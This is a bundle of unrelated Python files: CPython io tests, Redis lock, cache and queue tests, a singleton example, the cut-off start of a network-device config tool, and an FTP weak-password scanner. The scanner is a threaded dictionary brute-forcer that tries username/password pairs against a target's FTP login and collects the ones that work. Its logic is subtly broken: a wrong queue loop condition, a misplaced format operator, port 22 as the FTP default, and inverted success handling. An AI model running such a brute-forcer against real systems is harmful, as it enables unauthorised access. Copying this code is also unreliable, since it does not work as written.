os_helper.unlink(os_helper.TESTFN)
def test___all__(self):
for name in self.io.__all__:
obj = getattr(self.io, name, None)
self.assertIsNotNone(obj, name)
if name in ("open", "open_code"):
continue
elif "error" in name.lower() or name == "UnsupportedOperation":
self.assertTrue(issubclass(obj, Exception), name)
elif not name.startswith("SEEK_"):
self.assertTrue(issubclass(obj, self.IOBase))
def test_attributes(self):
f = self.open(os_helper.TESTFN, "wb", buffering=0)
self.assertEqual(f.mode, "wb")
f.close()
f = self.open(os_helper.TESTFN, "w+", encoding="utf-8")
self.assertEqual(f.mode, "w+")
self.assertEqual(f.buffer.mode, "rb+") # Does it really matter?
self.assertEqual(f.buffer.raw.mode, "rb+")
g = self.open(f.fileno(), "wb", closefd=False)
self.assertEqual(g.mode, "wb")
self.assertEqual(g.raw.mode, "wb")
self.assertEqual(g.name, f.fileno())
self.assertEqual(g.raw.name, f.fileno())
f.close()
g.close()
def test_removed_u_mode(self):
# bpo-37330: The "U" mode has been removed in Python 3.11
for mode in ("U", "rU", "r+U"):
with self.assertRaises(ValueError) as cm:
self.open(os_helper.TESTFN, mode)
self.assertIn('invalid mode', str(cm.exception))
@unittest.skipIf(
support.is_emscripten, "fstat() of a pipe fd is not supported"
)
def test_open_pipe_with_append(self):
# bpo-27805: Ignore ESPIPE from lseek() in open().
r, w = os.pipe()
self.addCleanup(os.close, r)
f = self.open(w, 'a', encoding="utf-8")
self.addCleanup(f.close)
# Check that the file is marked non-seekable. On Windows, however, lseek
# somehow succeeds on pipes.
if sys.platform != 'win32':
self.assertFalse(f.seekable())
def test_io_after_close(self):
for kwargs in [
{"mode": "w"},
{"mode": "wb"},
{"mode": "w", "buffering": 1},
{"mode": "w", "buffering": 2},
{"mode": "wb", "buffering": 0},
{"mode": "r"},
{"mode": "rb"},
{"mode": "r", "buffering": 1},
{"mode": "r", "buffering": 2},
{"mode": "rb", "buffering": 0},
{"mode": "w+"},
{"mode": "w+b"},
{"mode": "w+", "buffering": 1},
{"mode": "w+", "buffering": 2},
{"mode": "w+b", "buffering": 0},
]:
if "b" not in kwargs["mode"]:
kwargs["encoding"] = "utf-8"
f = self.open(os_helper.TESTFN, **kwargs)
f.close()
self.assertRaises(ValueError, f.flush)
self.assertRaises(ValueError, f.fileno)
self.assertRaises(ValueError, f.isatty)
self.assertRaises(ValueError, f.__iter__)
if hasattr(f, "peek"):
self.assertRaises(ValueError, f.peek, 1)
self.assertRaises(ValueError, f.read)
if hasattr(f, "read1"):
self.assertRaises(ValueError, f.read1, 1024)
self.assertRaises(ValueError, f.read1)
if hasattr(f, "readall"):
self.assertRaises(ValueError, f.readall)
if hasattr(f, "readinto"):
self.assertRaises(ValueError, f.readinto, bytearray(1024))
if hasattr(f, "readinto1"):
self.assertRaises(ValueError, f.readinto1, bytearray(1024))
self.assertRaises(ValueError, f.readline)
self.assertRaises(ValueError, f.readlines)
self.assertRaises(ValueError, f.readlines, 1)
self.assertRaises(ValueError, f.seek, 0)
self.assertRaises(ValueError, f.tell)
self.assertRaises(ValueError, f.truncate)
self.assertRaises(ValueError, f.write,
b"" if "b" in kwargs['mode'] else "")
self.assertRaises(ValueError, f.writelines, [])
self.assertRaises(ValueError, next, f)
def test_blockingioerror(self):
# Various BlockingIOError issues
class C(str):
pass
c = C("")
b = self.BlockingIOError(1, c)
c.b = b
b.c = c
wr = weakref.ref(c)
del c, b
support.gc_collect()
self.assertIsNone(wr(), wr)
def test_abcs(self):
# Test the visible base classes are ABCs.
self.assertIsInstance(self.IOBase, abc.ABCMeta)
self.assertIsInstance(self.RawIOBase, abc.ABCMeta)
self.assertIsInstance(self.BufferedIOBase, abc.ABCMeta)
self.assertIsInstance(self.TextIOBase, abc.ABCMeta)
def _check_abc_inheritance(self, abcmodule):
with self.open(os_helper.TESTFN, "wb", buffering=0) as f:
self.assertIsInstance(f, abcmodule.IOBase)
self.assertIsInstance(f, abcmodule.RawIOBase)
self.assertNotIsInstance(f, abcmodule.BufferedIOBase)
self.assertNotIsInstance(f, abcmodule.TextIOBase)
with self.open(os_helper.TESTFN, "wb") as f:
self.assertIsInstance(f, abcmodule.IOBase)
self.assertNotIsInstance(f, abcmodule.RawIOBase)
self.assertIsInstance(f, abcmodule.BufferedIOBase)
self.assertNotIsInstance(f, abcmodule.TextIOBase)
with self.open(os_helper.TESTFN, "w", encoding="utf-8") as f:
self.assertIsInstance(f, abcmodule.IOBase)
self.assertNotIsInstance(f, abcmodule.RawIOBase)
self.assertNotIsInstance(f, abcmodule.BufferedIOBase)
self.assertIsInstance(f, abcmodule.TextIOBase)
def test_abc_inheritance(self):
# Test implementations inherit from their respective ABCs
self._check_abc_inheritance(self)
def test_abc_inheritance_official(self):
# Test implementations inherit from the official ABCs of the
# baseline "io" module.
self._check_abc_inheritance(io)
def _check_warn_on_dealloc(self, *args, **kwargs):
f = open(*args, **kwargs)
r = repr(f)
with self.assertWarns(ResourceWarning) as cm:
f = None
support.gc_collect()
self.assertIn(r, str(cm.warning.args[0]))
def test_warn_on_dealloc(self):
self._check_warn_on_dealloc(os_helper.TESTFN, "wb", buffering=0)
self._check_warn_on_dealloc(os_helper.TESTFN, "wb")
self._check_warn_on_dealloc(os_helper.TESTFN, "w", encoding="utf-8")
def _check_warn_on_dealloc_fd(self, *args, **kwargs):
fds = []
def cleanup_fds():
for fd in fds:
try:
os.close(fd)
except OSError as e:
if e.errno != errno.EBADF:
raise
self.addCleanup(cleanup_fds)
r, w = os.pipe()
fds += r, w
self._check_warn_on_dealloc(r, *args, **kwargs)
# When using closefd=False, there's no warning
r, w = os.pipe()
fds += r, w
with warnings_helper.check_no_resource_warning(self):
open(r, *args, closefd=False, **kwargs)
def test_warn_on_dealloc_fd(self):
self._check_warn_on_dealloc_fd("rb", buffering=0)
self._check_warn_on_dealloc_fd("rb")
self._check_warn_on_dealloc_fd("r", encoding="utf-8")
def test_pickling(self):
# Pickling file objects is forbidden
for kwargs in [
{"mode": "w"},
{"mode": "wb"},
{"mode": "wb", "buffering": 0},
{"mode": "r"},
{"mode": "rb"},
{"mode": "rb", "buffering": 0},
{"mode": "w+"},
{"mode": "w+b"},
{"mode": "w+b", "buffering": 0},
]:
if "b" not in kwargs["mode"]:
kwargs["encoding"] = "utf-8"
for protocol in range(pickle.HIGHEST_PROTOCOL + 1):
with self.open(os_helper.TESTFN, **kwargs) as f:
self.assertRaises(TypeError, pickle.dumps, f, protocol)
@unittest.skipIf(
support.is_emscripten, "fstat() of a pipe fd is not supported"
)
def test_nonblock_pipe_write_bigbuf(self):
self._test_nonblock_pipe_write(16*1024)
@unittest.skipIf(
support.is_emscripten, "fstat() of a pipe fd is not supported"
)
def test_nonblock_pipe_write_smallbuf(self):
self._test_nonblock_pipe_write(1024)
@unittest.skipUnless(hasattr(os, 'set_blocking'),
'os.set_blocking() required for this test')
def _test_nonblock_pipe_write(self, bufsize):
sent = []
received = []
r, w = os.pipe()
os.set_blocking(r, False)
os.set_blocking(w, False)
# To exercise all code paths in the C implementation we need
# to play with buffer sizes. For instance, if we choose a
# buffer size less than or equal to _PIPE_BUF (4096 on Linux)
# then we will never get a partial write of the buffer.
rf = self.open(r, mode='rb', closefd=True, buffering=bufsize)
wf = self.open(w, mode='wb', closefd=True, buffering=bufsize)
with rf, wf:
for N in 9999, 73, 7574:
try:
i = 0
while True:
msg = bytes([i % 26 + 97]) * N
sent.append(msg)
wf.write(msg)
i += 1
except self.BlockingIOError as e:
self.assertEqual(e.args[0], errno.EAGAIN)
self.assertEqual(e.args[2], e.characters_written)
sent[-1] = sent[-1][:e.characters_written]
received.append(rf.read())
msg = b'BLOCKED'
wf.write(msg)
sent.append(msg)
while True:
try:
wf.flush()
break
except self.BlockingIOError as e:
self.assertEqual(e.args[0], errno.EAGAIN)
self.assertEqual(e.args[2], e.characters_written)
self.assertEqual(e.characters_written, 0)
received.append(rf.read())
received += iter(rf.read, None)
sent, received = b''.join(sent), b''.join(received)
self.assertEqual(sent, received)
self.assertTrue(wf.closed)
self.assertTrue(rf.closed)
def test_create_fail(self):
# 'x' mode fails if file is existing
with self.open(os_helper.TESTFN, 'w', encoding="utf-8"):
pass
self.assertRaises(FileExistsError, self.open, os_helper.TESTFN, 'x', encoding="utf-8")
def test_create_writes(self):
# 'x' mode opens for writing
with self.open(os_helper.TESTFN, 'xb') as f:
f.write(b"spam")
with self.open(os_helper.TESTFN, 'rb') as f:
self.assertEqual(b"spam", f.read())
def test_open_allargs(self):
# there used to be a buffer overflow in the parser for rawmode
self.assertRaises(ValueError, self.open, os_helper.TESTFN, 'rwax+', encoding="utf-8")
def test_check_encoding_errors(self):
# bpo-37388: open() and TextIOWrapper must check encoding and errors
# arguments in dev mode
mod = self.io.__name__
filename = __file__
invalid = 'Boom, Shaka Laka, Boom!'
code = textwrap.dedent(f'''
import sys
from {mod} import open, TextIOWrapper
try:
open({filename!r}, encoding={invalid!r})
except LookupError:
pass
else:
sys.exit(21)
try:
open({filename!r}, errors={invalid!r})
except LookupError:
pass
else:
sys.exit(22)
fp = open({filename!r}, "rb")
with fp:
try:
TextIOWrapper(fp, encoding={invalid!r})
except LookupError:
pass
else:
sys.exit(23)
try:
TextIOWrapper(fp, errors={invalid!r})
except LookupError:
pass
else:
sys.exit(24)
sys.exit(10)
''')
proc = assert_python_failure('-X', 'dev', '-c', code)
self.assertEqual(proc.rc, 10, proc)
def test_check_encoding_warning(self):
# PEP 597: Raise warning when encoding is not specified
# and sys.flags.warn_default_encoding is set.
mod = self.io.__name__
filename = __file__
code = textwrap.dedent(f'''\
import sys
from {mod} import open, TextIOWrapper
import pathlib
with open({filename!r}) as f: # line 5
pass
pathlib.Path({filename!r}).read_text() # line 8
''')
proc = assert_python_ok('-X', 'warn_default_encoding', '-c', code)
warnings = proc.err.splitlines()
self.assertEqual(len(warnings), 2)
self.assertTrue(
warnings[0].startswith(b"<string>:5: EncodingWarning: "))
self.assertTrue(
warnings[1].startswith(b"<string>:8: EncodingWarning: "))
def test_text_encoding(self):
# PEP 597, bpo-47000. io.text_encoding() returns "locale" or "utf-8"
# based on sys.flags.utf8_mode
code = "import io; print(io.text_encoding(None))"
proc = assert_python_ok('-X', 'utf8=0', '-c', code)
self.assertEqual(b"locale", proc.out.strip())
proc = assert_python_ok('-X', 'utf8=1', '-c', code)
self.assertEqual(b"utf-8", proc.out.strip())
@support.cpython_only
# Depending if OpenWrapper was already created or not, the warning is
# emitted or not. For example, the attribute is already created when this
# test is run multiple times.
@warnings_helper.ignore_warnings(category=DeprecationWarning)
def test_openwrapper(self):
self.assertIs(self.io.OpenWrapper, self.io.open)
class CMiscIOTest(MiscIOTest):
io = io
def test_readinto_buffer_overflow(self):
# Issue #18025
class BadReader(self.io.BufferedIOBase):
def read(self, n=-1):
return b'x' * 10**6
bufio = BadReader()
b = bytearray(2)
self.assertRaises(ValueError, bufio.readinto, b)
def check_daemon_threads_shutdown_deadlock(self, stream_name):
# Issue #23309: deadlocks at shutdown should be avoided when a
# daemon thread and the main thread both write to a file.
code = """if 1:
import sys
import time
import threading
from test.support import SuppressCrashReport
file = sys.{stream_name}
def run():
while True:
file.write('.')
file.flush()
crash = SuppressCrashReport()
crash.__enter__()
# don't call __exit__(): the crash occurs at Python shutdown
thread = threading.Thread(target=run)
thread.daemon = True
thread.start()
time.sleep(0.5)
file.write('!')
file.flush()
""".format_map(locals())
res, _ = run_python_until_end("-c", code)
err = res.err.decode()
if res.rc != 0:
# Failure: should be a fatal error
pattern = (r"Fatal Python error: _enter_buffered_busy: "
r"could not acquire lock "
r"for <(_io\.)?BufferedWriter name='<{stream_name}>'> "
r"at interpreter shutdown, possibly due to "
r"daemon threads".format_map(locals()))
self.assertRegex(err, pattern)
else:
self.assertFalse(err.strip('.!'))
@threading_helper.requires_working_threading()
def test_daemon_threads_shutdown_stdout_deadlock(self):
self.check_daemon_threads_shutdown_deadlock('stdout')
@threading_helper.requires_working_threading()
def test_daemon_threads_shutdown_stderr_deadlock(self):
self.check_daemon_threads_shutdown_deadlock('stderr')
class PyMiscIOTest(MiscIOTest):
io = pyio
@unittest.skipIf(os.name == 'nt', 'POSIX signals required for this test.')
class SignalsTest(unittest.TestCase):
def setUp(self):
self.oldalrm = signal.signal(signal.SIGALRM, self.alarm_interrupt)
def tearDown(self):
signal.signal(signal.SIGALRM, self.oldalrm)
def alarm_interrupt(self, sig, frame):
1/0
def check_interrupted_write(self, item, bytes, **fdopen_kwargs):
"""Check that a partial write, when it gets interrupted, properly
invokes the signal handler, and bubbles up the exception raised
in the latter."""
# XXX This test has three flaws that appear when objects are
# XXX not reference counted.
# - if wio.write() happens to trigger a garbage collection,
# the signal exception may be raised when some __del__
# method is running; it will not reach the assertRaises()
# call.
# - more subtle, if the wio object is not destroyed at once
# and survives this function, the next opened file is likely
# to have the same fileno (since the file descriptor was
# actively closed). When wio.__del__ is finally called, it
# will close the other's test file... To trigger this with
# CPython, try adding "global wio" in this function.
# - This happens only for streams created by the _pyio module,
# because a wio.close() that fails still consider that the
# file needs to be closed again. You can try adding an
# "assert wio.closed" at the end of the function.
# Fortunately, a little gc.collect() seems to be enough to
# work around all these issues.
support.gc_collect() # For PyPy or other GCs.
read_results = []
def _read():
s = os.read(r, 1)
read_results.append(s)
t = threading.Thread(target=_read)
t.daemon = True
r, w = os.pipe()
fdopen_kwargs["closefd"] = False
large_data = item * (support.PIPE_MAX_SIZE // len(item) + 1)
try:
wio = self.io.open(w, **fdopen_kwargs)
if hasattr(signal, 'pthread_sigmask'):
# create the thread with SIGALRM signal blocked
signal.pthread_sigmask(signal.SIG_BLOCK, [signal.SIGALRM])
t.start()
signal.pthread_sigmask(signal.SIG_UNBLOCK, [signal.SIGALRM])
else:
t.start()
# Fill the pipe enough that the write will be blocking.
# It will be interrupted by the timer armed above. Since the
# other thread has read one byte, the low-level write will
# return with a successful (partial) result rather than an EINTR.
# The buffered IO layer must check for pending signal
# handlers, which in this case will invoke alarm_interrupt().
signal.alarm(1)
try:
self.assertRaises(ZeroDivisionError, wio.write, large_data)
finally:
signal.alarm(0)
t.join()
# We got one byte, get another one and check that it isn't a
# repeat of the first one.
read_results.append(os.read(r, 1))
self.assertEqual(read_results, [bytes[0:1], bytes[1:2]])
finally:
os.close(w)
os.close(r)
# This is deliberate. If we didn't close the file descriptor
# before closing wio, wio would try to flush its internal
# buffer, and block again.
try:
wio.close()
except OSError as e:
if e.errno != errno.EBADF:
raise
@requires_alarm
def test_interrupted_write_unbuffered(self):
self.check_interrupted_write(b"xy", b"xy", mode="wb", buffering=0)
@requires_alarm
def test_interrupted_write_buffered(self):
self.check_interrupted_write(b"xy", b"xy", mode="wb")
@requires_alarm
def test_interrupted_write_text(self):
self.check_interrupted_write("xy", b"xy", mode="w", encoding="ascii")
@support.no_tracing
def check_reentrant_write(self, data, **fdopen_kwargs):
def on_alarm(*args):
# Will be called reentrantly from the same thread
wio.write(data)
1/0
signal.signal(signal.SIGALRM, on_alarm)
r, w = os.pipe()
wio = self.io.open(w, **fdopen_kwargs)
try:
signal.alarm(1)
# Either the reentrant call to wio.write() fails with RuntimeError,
# or the signal handler raises ZeroDivisionError.
with self.assertRaises((ZeroDivisionError, RuntimeError)) as cm:
while 1:
for i in range(100):
wio.write(data)
wio.flush()
# Make sure the buffer doesn't fill up and block further writes
os.read(r, len(data) * 100)
exc = cm.exception
if isinstance(exc, RuntimeError):
self.assertTrue(str(exc).startswith("reentrant call"), str(exc))
finally:
signal.alarm(0)
wio.close()
os.close(r)
@requires_alarm
def test_reentrant_write_buffered(self):
self.check_reentrant_write(b"xy", mode="wb")
@requires_alarm
def test_reentrant_write_text(self):
self.check_reentrant_write("xy", mode="w", encoding="ascii")
def check_interrupted_read_retry(self, decode, **fdopen_kwargs):
"""Check that a buffered read, when it gets interrupted (either
returning a partial result or EINTR), properly invokes the signal
handler and retries if the latter returned successfully."""
r, w = os.pipe()
fdopen_kwargs["closefd"] = False
def alarm_handler(sig, frame):
os.write(w, b"bar")
signal.signal(signal.SIGALRM, alarm_handler)
try:
rio = self.io.open(r, **fdopen_kwargs)
os.write(w, b"foo")
signal.alarm(1)
# Expected behaviour:
# - first raw read() returns partial b"foo"
# - second raw read() returns EINTR
# - third raw read() returns b"bar"
self.assertEqual(decode(rio.read(6)), "foobar")
finally:
signal.alarm(0)
rio.close()
os.close(w)
os.close(r)
@requires_alarm
def test_interrupted_read_retry_buffered(self):
self.check_interrupted_read_retry(lambda x: x.decode('latin1'),
mode="rb")
@requires_alarm
def test_interrupted_read_retry_text(self):
self.check_interrupted_read_retry(lambda x: x,
mode="r", encoding="latin1")
def check_interrupted_write_retry(self, item, **fdopen_kwargs):
"""Check that a buffered write, when it gets interrupted (either
returning a partial result or EINTR), properly invokes the signal
handler and retries if the latter returned successfully."""
select = import_helper.import_module("select")
# A quantity that exceeds the buffer size of an anonymous pipe's
# write end.
N = support.PIPE_MAX_SIZE
r, w = os.pipe()
fdopen_kwargs["closefd"] = False
# We need a separate thread to read from the pipe and allow the
# write() to finish. This thread is started after the SIGALRM is
# received (forcing a first EINTR in write()).
read_results = []
write_finished = False
error = None
def _read():
try:
while not write_finished:
while r in select.select([r], [], [], 1.0)[0]:
s = os.read(r, 1024)
read_results.append(s)
except BaseException as exc:
nonlocal error
error = exc
t = threading.Thread(target=_read)
t.daemon = True
def alarm1(sig, frame):
signal.signal(signal.SIGALRM, alarm2)
signal.alarm(1)
def alarm2(sig, frame):
t.start()
large_data = item * N
signal.signal(signal.SIGALRM, alarm1)
try:
wio = self.io.open(w, **fdopen_kwargs)
signal.alarm(1)
# Expected behaviour:
# - first raw write() is partial (because of the limited pipe buffer
# and the first alarm)
# - second raw write() returns EINTR (because of the second alarm)
# - subsequent write()s are successful (either partial or complete)
written = wio.write(large_data)
self.assertEqual(N, written)
wio.flush()
write_finished = True
t.join()
self.assertIsNone(error)
self.assertEqual(N, sum(len(x) for x in read_results))
finally:
signal.alarm(0)
write_finished = True
os.close(w)
os.close(r)
# This is deliberate. If we didn't close the file descriptor
# before closing wio, wio would try to flush its internal
# buffer, and could block (in case of failure).
try:
wio.close()
except OSError as e:
if e.errno != errno.EBADF:
raise
@requires_alarm
def test_interrupted_write_retry_buffered(self):
self.check_interrupted_write_retry(b"x", mode="wb")
@requires_alarm
def test_interrupted_write_retry_text(self):
self.check_interrupted_write_retry("x", mode="w", encoding="latin1")
class CSignalsTest(SignalsTest):
io = io
class PySignalsTest(SignalsTest):
io = pyio
# Handling reentrancy issues would slow down _pyio even more, so the
# tests are disabled.
test_reentrant_write_buffered = None
test_reentrant_write_text = None
def load_tests(loader, tests, pattern):
tests = (CIOTest, PyIOTest, APIMismatchTest,
CBufferedReaderTest, PyBufferedReaderTest,
CBufferedWriterTest, PyBufferedWriterTest,
CBufferedRWPairTest, PyBufferedRWPairTest,
CBufferedRandomTest, PyBufferedRandomTest,
StatefulIncrementalDecoderTest,
CIncrementalNewlineDecoderTest, PyIncrementalNewlineDecoderTest,
CTextIOWrapperTest, PyTextIOWrapperTest,
CMiscIOTest, PyMiscIOTest,
CSignalsTest, PySignalsTest,
)
# Put the namespaces of the IO module we are testing and some useful mock
# classes in the __dict__ of each test.
mocks = (MockRawIO, MisbehavedRawIO, MockFileIO, CloseFailureIO,
MockNonBlockWriterIO, MockUnseekableIO, MockRawIOWithoutRead,
SlowFlushRawIO)
all_members = io.__all__ + ["IncrementalNewlineDecoder"]
c_io_ns = {name : getattr(io, name) for name in all_members}
py_io_ns = {name : getattr(pyio, name) for name in all_members}
globs = globals()
c_io_ns.update((x.__name__, globs["C" + x.__name__]) for x in mocks)
py_io_ns.update((x.__name__, globs["Py" + x.__name__]) for x in mocks)
for test in tests:
if test.__name__.startswith("C"):
for name, obj in c_io_ns.items():
setattr(test, name, obj)
elif test.__name__.startswith("Py"):
for name, obj in py_io_ns.items():
setattr(test, name, obj)
suite = loader.suiteClass()
for test in tests:
suite.addTest(loader.loadTestsFromTestCase(test))
return suite
if __name__ == "__main__":
unittest.main()
|
test_redis.py
|
# -*- coding: utf-8 -*-
import threading
import time
import unittest
from jukoro import redis
URI = 'redis://localhost/2'
NS = 'JuTest'
TTL = 1
class Base(unittest.TestCase):
db = None
@classmethod
def setUpClass(cls):
cls.db = redis.RedisDb(URI, ns=NS)
class TestRedisDb(Base):
def test_key(self):
self.assertEqual(self.db.key('a'), 'JuTest:a')
def test_set_get(self):
db = self.db
key, val = self.db.key('a'), 'TV'
db.set(key, val)
self.assertEqual(val, db.get(key))
db.delete(key)
self.assertNotEqual(val, db.get(key))
def test_expire(self):
db = self.db
key, val = self.db.key('a'), 'TV'
db.set(key, val, ex=TTL)
self.assertEqual(val, db.get(key))
time.sleep(TTL)
self.assertNotEqual(val, db.get(key))
class TestRedisLock(Base):
def test_no_wait(self):
db = self.db
key = 'write:lock'
lock_a = redis.RedisLock(db, key)
with lock_a:
lock_b = redis.RedisLock(db, key)
self.assertRaises(redis.AlreadyLocked, lock_b.acquire)
def test_wait_ok(self):
db = self.db
key = 'wl'
self.assertNotEqual(db.get(db.key('a')), '2015')
lock = redis.RedisLock(db, key, ttl=2, wait=True)
def lock_and_set():
db = redis.RedisDb(URI, ns=NS)
key = 'wl'
with redis.RedisLock(db, key):
db.set(db.key('a'), '2015')
time.sleep(1.5)
task = threading.Thread(target=lock_and_set)
task.daemon = True
task.start()
time.sleep(.1) # delay to allow thread to start
with lock:
v = db.get(db.key('a'))
self.assertEqual(v, '2015')
db.delete(db.key('a'))
def test_wait_failed(self):
db = self.db
key = 'wl2'
db.delete(db.key('b'))
lock = redis.RedisLock(db, key, ttl=2, wait=True)
def lock_and_set():
db = redis.RedisDb(URI, ns=NS)
key = 'wl2'
with redis.RedisLock(db, key):
db.set(db.key('b'), '2015')
time.sleep(3.5)
db.delete(db.key('b'))
task = threading.Thread(target=lock_and_set)
task.daemon = True
task.start()
time.sleep(.1) # delay to allow thread to start
def get_val():
with lock:
db.get(db.key('b'))
self.assertRaises(redis.AlreadyLocked, get_val)
class TestRedisCache(Base):
def test_ns(self):
db = self.db
cache = redis.RedisCache(db)
self.assertTrue(cache.ns.startswith('JuTest:cache'))
def test_cache(self):
cache = redis.RedisCache(self.db)
key = cache.key('a', 'b', 3)
a = {'a': 12, 'b': 33}
cache.set(key, a)
b = cache.get(key)
self.assertEqual(a, b)
self.assertIsNot(a, b)
cache.delete(key)
self.assertIsNone(cache.get(key))
def test_cache_expire(self):
cache = redis.RedisCache(self.db, ttl=1)
key = cache.key('a', 'b', 3)
a = {'a': 12, 'b': 33}
cache.set(key, a)
time.sleep(1.1)
self.assertIsNone(cache.get(key))
def test_cache_expirei2(self):
cache = redis.RedisCache(self.db)
key = cache.key('a', 'b', 3)
a = {'a': 12, 'b': 33}
cache.set(key, a, ttl=1)
self.assertEqual(a, cache.get(key))
time.sleep(1.1)
self.assertIsNone(cache.get(key))
class TestRedisQueue(Base):
def test_control_queue(self):
from jukoro.redis.queue import CONTROL_QUEUE
queue = redis.RedisQueue(self.db, CONTROL_QUEUE)
self.assertRaises(redis.QueueError, lambda: queue.keys)
def test_queue(self):
def sender():
db = redis.RedisDb(URI, ns=NS)
queue = redis.RedisQueue(db)
time.sleep(.3)
queue.put('l1', 'a', 'b', 'c')
time.sleep(.3)
queue.put('l2', 'd', 'e', 'f')
time.sleep(.3)
queue.stop()
thread = threading.Thread(target=sender)
thread.daemon = True
thread.start()
queue = redis.RedisQueue(self.db, ['l1', 'l2'])
time.sleep(.1)
res = dict((self.db.key(x), []) for x in ['l1', 'l2'])
for channel, val in queue.consume():
res[channel].append(val)
self.assertEqual(res[self.db.key('l1')], ['a', 'b', 'c'])
self.assertEqual(res[self.db.key('l2')], ['d', 'e', 'f'])
|
FTPPasswordScanner.py
|
import threading
import queue
import ftplib
import json
import socket
class Scanner():
def __init__(self):
self.Url = None
self.addr = None
self.port = 22
self.UsernameFile = None
self.PasswordFile = None
self.UserpassFile = None
self.Threads = 10
self._Counter = 0
self.Timeout = 3
self.UserPassList = []
self.queue =queue.Queue()
self.Name = 'FTP Password'
def GetFTPPassword(self):
UserpassList = self.LoadPasswordDictionary()
self.addr = socket.gethostbyname(self.Url)
self.port = int(self.port)
self.Threads = int(self.Threads)
self.Timeout = int(self.Timeout)
try:
while not self.queue.not_empty:
if self._Counter < self.Threads:
self._Counter += 1
thread = threading.Thread(target=self.CheckPassword, args=[self.queue.get()])
thread.start()
except KeyboardInterrupt:
print '[*] Keyboard interrupt: Quitting.'
return
except Exception, e:
print '[!] Failed attaining FTP password: %s' %(str(e))
return self.UserPassList
def LoadPasswordDictionary(self):
if not self.PasswordFile:
if not self.UsernameFile:
mode = 1
else:
print '[!] Please specify username file.'
return
else:
mode = 0
if mode:
UserPassJson = json.load(open('FTPPassword.json', 'r'))
PasswordList = UserPassJson['password']
UsernameList = UserPassJson['user']
else:
UsernameList = open(self.UsernameFile, 'r').read().split('\n')
PasswordList = open(self.PasswordFile, 'r').read().split('\n')
UsernameList = self.RemoveDuplicate(UsernameList)
PasswordList = self.RemoveDuplicate(PasswordList)
for username in UsernameList:
for password in PasswordList:
self.queue.put('%s:%s') %(username, password)
print '[+] Dictionary load completed, Total %s user-pass pairs.' %(str(self.queue.qsize()))
def CheckPassword(self, credential):
username , password = credential.split(':')
sess = ftplib.FTP(host=self.addr, user=username, passwd=password)
try:
sess.connect(self.addr, self.port, timeout=int(self.Timeout))
print '[+] Connect success: %s' %(str(credential))
except ftplib.error_perm:
pass
except Exception, e:
print '[!] Error trying to login: %s' %(str(e))
self.UserPassList.append(credential)
return
def RemoveDuplicate(self, dict):
NewList = []
for item in dict:
if item not in NewList:
NewList.append(item)
return NewList
def Scan(self):
FTPPasswordList = self.GetFTPPassword()
return FTPPasswordList
def info(self):
print '''
SWEP FTP PASSWORD SCANNER
Author: BREACHER security
Description: FTP weak password scanner.
ARGS DESCRIPTION
==== ===========
Url Target URL. e.g: www.test.com
Port Target port. Default: 22
UsernameFile (OPTIONAL) Username File.
PasswordFile (OPTIONAL) Password File.
UserPassFile (OPTIONAL) Username and password file.
Threads Threads. Default: 10
Timeout Timeout. Default
'''
|
singleton.py
|
# Example of 'Singleton' design pattern (thread-safe version)
from __future__ import annotations
from threading import Lock, Thread
from typing import Optional
class UserMeta(type):
"""Meta class for the Singleton"""
_instance: Optional[User] = None
_lock: Lock = Lock()
def __call__(cls, *args, **kwargs):
with cls._lock:
if not cls._instance:
cls._instance = super().__call__(*args, **kwargs)
return cls._instance
class User(metaclass=UserMeta):
"""Singleton"""
def __init__(self, login: str) -> None:
self.login = login
def __str__(self) -> str:
return f'User: {self.login}'
def create_user(login: str) -> None:
user = User(login)
print(user)
if __name__ == '__main__':
process_one = Thread(target=create_user, args=('__SuperJoe__',))
process_two = Thread(target=create_user, args=('__NotSoSuperJoe__',))
process_one.start()
process_two.start()
|
nosmct.py
|
# Andrew Piroli (c)2019-2021
# MIT LICENSE #
import datetime as dtime
import multiprocessing as mp
import argparse
import os
import logging
import mctlogger
from concurrent.futures import ProcessPoolExecutor, wait
from netmiko import ConnectHandler # type: ignore
from netmiko import NetmikoAuthenticationException, NetmikoTimeoutException
from constants import (
NUM_THREADS_DEFAULT,
THREAD_KILL_MSG,
OperatingModes,
)
from FileOperations import (
abspath,
set_dir,
load_jobfile,
read_config,
preload_jobfile,
sanitize_filename,
)
def run(info: dict, p_config: dict):
"""
Worker thread running in process
Creates a connection to the specified device, creates a folder for it, and runs throuigh the jobfile saving the results to the folder
info dict contains device information like ip/hostname, device type, and login details
p_config dictionary contains configuration info on how the function itself should operate. It contains:
mode is class OperatingMode, which tells the process how to interpret the jobs
log_queue is a queue to place log messages
jobfile is the path to the jobfile incase it's not already loaded
jobfile_cache is a dict with a cached list of commands for each device_type
netmiko_debug is a path to a debug file, if present, it will log raw io for each device.
"""
original_directory = abspath(".")
mode = p_config["mode"]
log_q = p_config["log_queue"]
host = info["host"]
jobfile = p_config["jobfile"]
jobfile_cache = p_config["jobfile_cache"]
log_q.put(f"warning running - {host}")
nm_logger = logging.getLogger("netmiko")
nm_logger.removeHandler(nm_logger.handlers[0])
jobfile = jobfile_cache if jobfile_cache is not None else load_jobfile(jobfile)
if p_config["netmiko_debug"] is not None:
nm_logger.setLevel(logging.DEBUG)
nm_log_fh = logging.FileHandler(
str(p_config["netmiko_debug"]) + f"{os.getpid()}.log"
)
nm_logger.addHandler(nm_log_fh)
else:
nm_logger.addHandler(logging.NullHandler())
nm_logger.propagate = False
try:
with ConnectHandler(**info) as connection:
connection.enable()
hostname = sanitize_filename(connection.find_prompt().split("#")[0])
set_dir(original_directory / hostname, log_q)
log_q.put(f"debug run: Found hostname: {hostname} for {host}")
if mode == OperatingModes.YoinkMode:
for cmd in jobfile:
filename = f"{sanitize_filename(cmd)}.txt"
log_q.put(f"debug run: Got filename: {filename} for {host}")
with open(filename, "w") as output_file:
output_file.write(connection.send_command(cmd))
else: # mode == OperatingModes.YeetMode
filename = "configset.txt"
log_q.put(f"debug run: Got filename: {filename} for {host}")
try:
with open(filename, "w") as output_file:
output_file.write(connection.send_config_set(jobfile))
finally:
connection.save_config()
except (NetmikoTimeoutException, NetmikoAuthenticationException) as err:
log_q.put(f"critical Exception in netmiko connection: {err}")
except OSError as err:
log_q.put(f"critical Error writing file: {err}")
finally:
os.chdir(original_directory)
log_q.put(f"warning finished - {host}")
def handle_arguments() -> argparse.Namespace:
"""
Collects and parses command line arguments
"""
parser = argparse.ArgumentParser()
mode_selection = parser.add_mutually_exclusive_group(required=True)
mode_selection.add_argument(
"--yeet",
action="store_true",
help="Yeet mode, push configurations to NOS",
)
mode_selection.add_argument(
"--yoink",
action="store_true",
help="Yoink mode, pull configurations from NOS",
)
parser.add_argument(
